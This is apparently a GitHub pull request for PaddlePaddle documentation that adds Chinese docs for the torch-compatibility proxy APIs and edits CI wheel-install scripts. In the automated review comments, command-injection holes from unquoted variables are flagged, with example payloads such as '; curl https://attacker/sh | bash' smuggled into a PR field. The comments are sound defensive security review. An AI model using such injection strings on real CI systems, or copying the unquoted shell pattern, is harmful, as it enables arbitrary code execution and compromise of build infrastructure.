[Compat] Expose torch compat APIs as public API #7667
Conversation
SigureMo
requested review from
Echo-Nie,
jzhang533,
mattheliu,
ooooo-create and
sunzhongkai588
as code owners
|
感谢你贡献飞桨文档,文档预览构建中,Docs-New 跑完后即可预览,预览链接:http://preview-pr-7667.paddle-docs-preview.paddlepaddle.org.cn/documentation/docs/zh/api/index_cn.html |
📚 本次 PR 文档预览链接(点击展开)
|
There was a problem hiding this comment.
Pull request overview
This PR adds Chinese documentation for four PyTorch proxy APIs in the paddle.compat module, making these compatibility features accessible to Chinese-speaking developers.
- Adds documentation for four PyTorch proxy control functions:
enable_torch_proxy,disable_torch_proxy,use_torch_proxy_guard, andextend_torch_proxy_blocked_modules - Updates the Overview_cn.rst to include a new "PyTorch 兼容代理" (PyTorch Compatibility Proxy) section with references to these APIs
- Provides comprehensive parameter descriptions and code examples for each API
Reviewed changes
Copilot reviewed 5 out of 5 changed files in this pull request and generated 4 comments.
Show a summary per file
| File | Description |
|---|---|
| docs/api/paddle/compat/use_torch_proxy_guard_cn.rst | Adds documentation for context manager to temporarily enable/disable PyTorch proxy |
| docs/api/paddle/compat/extend_torch_proxy_blocked_modules_cn.rst | Adds documentation for extending the PyTorch proxy blocked modules list |
| docs/api/paddle/compat/enable_torch_proxy_cn.rst | Adds documentation for enabling PyTorch proxy functionality with two code examples |
| docs/api/paddle/compat/disable_torch_proxy_cn.rst | Adds documentation for disabling PyTorch proxy functionality |
| docs/api/paddle/compat/Overview_cn.rst | Adds new "PyTorch 兼容代理" section with table listing all four proxy APIs |
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
Co-authored-by: Copilot <[email protected]>
| fi | ||
| echo "Installing local wheel file..." | ||
| pip3 install --no-cache-dir -q --progress-bar off -i https://pypi.tuna.tsinghua.edu.cn/simple /tmp/paddle.whl | ||
| pip3 install --no-cache-dir -q --progress-bar off -i https://pypi.tuna.tsinghua.edu.cn/simple /tmp/${WHL_NAME} |
There was a problem hiding this comment.
2025-12-14 04:14:51 + echo 'Installing local wheel file...'
2025-12-14 04:14:51 Installing local wheel file...
2025-12-14 04:14:51 + pip3 install --no-cache-dir -q --progress-bar off -i https://pypi.tuna.tsinghua.edu.cn/simple /tmp/paddle.whl
2025-12-14 04:14:52 ERROR: paddle.whl is not a valid wheel filename
paddle.whl 非合法 wheel name
SigureMo
changed the title
| - **算子注册兼容层**:对于使用 pybind11 进行算子注册的 PyTorch 自定义算子,PaddlePaddle 无需额外修改注册代码;而对于使用 `TORCH_LIBRARY` 宏进行注册并通过 `torch.ops` 调用的算子,我们提供了同名的注册接口,用户无需修改注册代码即可完成迁移。 | ||
| - **Python 接口兼容层**:对于 Python 端自定义算子封装部分,会不可避免地调用一些 PyTorch 内的 Python 组网 API。为此,我们正在致力于提升 Python 端 API 与 PyTorch 的兼容性,力求让用户在迁移过程中无需修改 Python 端代码。 | ||
| - **Python API 代理层**:在 Python 端,即便 API 能够完全兼容,用户仍然需要将 `import torch` 替换为 `import paddle`。为此,我们提供了一个轻量级的代理层,用户只需在迁移后的代码开头添加一行 `import paddle.compat.enable_torch_proxy`,后续的 `torch` 下的模块将被重定向至 `paddle` 下的模块,从而实现无缝迁移。 | ||
| - **Python API 代理层**:在 Python 端,即便 API 能够完全兼容,用户仍然需要将 `import torch` 替换为 `import paddle`。为此,我们提供了一个轻量级的代理层,用户只需在迁移后的代码开头添加一行 `import paddle.enable_compat`,后续的 `torch` 下的模块将被重定向至 `paddle` 下的模块,从而实现无缝迁移。 |
There was a problem hiding this comment.
描述不准确。此处表述为"添加一行 import paddle.enable_compat",但 paddle.enable_compat 是一个函数,应该调用而非导入。建议修改为"调用 paddle.enable_compat() 函数"或"添加一行 paddle.enable_compat() 调用",以准确描述使用方式。
| if [[ "${PADDLE_WHL}" == 'http'*'.whl' ]]; then | ||
| echo "Downloading wheel file: ${PADDLE_WHL}" | ||
| wget -q ${PADDLE_WHL} -O /tmp/paddle.whl | ||
| WHL_NAME=$(basename ${PADDLE_WHL}) | ||
| wget -q ${PADDLE_WHL} -O /tmp/${WHL_NAME} |
There was a problem hiding this comment.
The use of PADDLE_WHL here is vulnerable to shell command injection because it is expanded unquoted in both basename and wget, and its value ultimately originates from PR metadata (via ci_start.sh). An attacker can craft a PADDLEPADDLE_PR value in a docs PR body containing shell metacharacters (e.g., ; or &&), which flows into PADDLE_WHL and causes arbitrary commands to be executed in the CI environment when this script runs. To fix this, strictly validate PADDLE_WHL against an allowlist of expected URL patterns and always quote it when passing to shell commands (e.g., in WHL_NAME computation and the wget invocation).
| pip3 install --no-cache-dir -q --progress-bar off -i https://pypi.tuna.tsinghua.edu.cn/simple /tmp/${WHL_NAME} | ||
| else | ||
| echo "Using pip install directly..." | ||
| pip3 install --no-cache-dir -q --progress-bar off -i https://pypi.tuna.tsinghua.edu.cn/simple ${PADDLE_WHL} |
There was a problem hiding this comment.
PADDLE_WHL is expanded unquoted when passed to pip3 install, which allows shell command injection if an attacker controls this variable via the docs PR metadata (PADDLEPADDLE_PR → paddle_pr_id → paddle_whl_tmp → PADDLE_WHL). A malicious value like "https://example.com/a.whl; curl https://attacker/sh | bash" would cause the extra command to run in the CI environment rather than just installing the wheel. To mitigate this, ensure PADDLE_WHL is strictly validated (e.g., only trusted domains and formats) and always quoted when used as a shell argument to pip3.
There was a problem hiding this comment.
好像有道理,后面再看看
| paddle_whl_tmp="https://paddle-github-action.bj.bcebos.com/PR/build/${paddle_pr_id}/${paddle_pr_latest_commit}/paddlepaddle_gpu-0.0.0-cp310-cp310-linux_x86_64.whl" | ||
| http_code=$(curl -sIL -w "%{http_code}" -o /dev/null -X GET -k ${paddle_whl_tmp}) |
There was a problem hiding this comment.
paddle_whl_tmp is interpolated into the curl command without quoting, and its value is built from paddle_pr_id, which in turn is parsed from the docs PR body (PADDLEPADDLE_PR in get_paddle_pr_num_from_docs_pr_info). A malicious contributor can embed shell metacharacters in the PR body (e.g., PADDLEPADDLE_PR=123; curl https://attacker/sh | bash) so that when paddle_whl_tmp is constructed and expanded here, arbitrary commands execute in the CI environment. To prevent this, treat paddle_pr_id as untrusted: strictly validate it (e.g., numeric-only), construct URLs safely, and always quote paddle_whl_tmp when passing it to shell commands like curl.
Co-authored-by: Copilot <[email protected]>
docs/guides/custom_op/cross_ecosystem_custom_op/design_and_migration_cn.md
Outdated
Show resolved
Hide resolved
3 participants
Uh oh!
There was an error while loading. Please reload this page.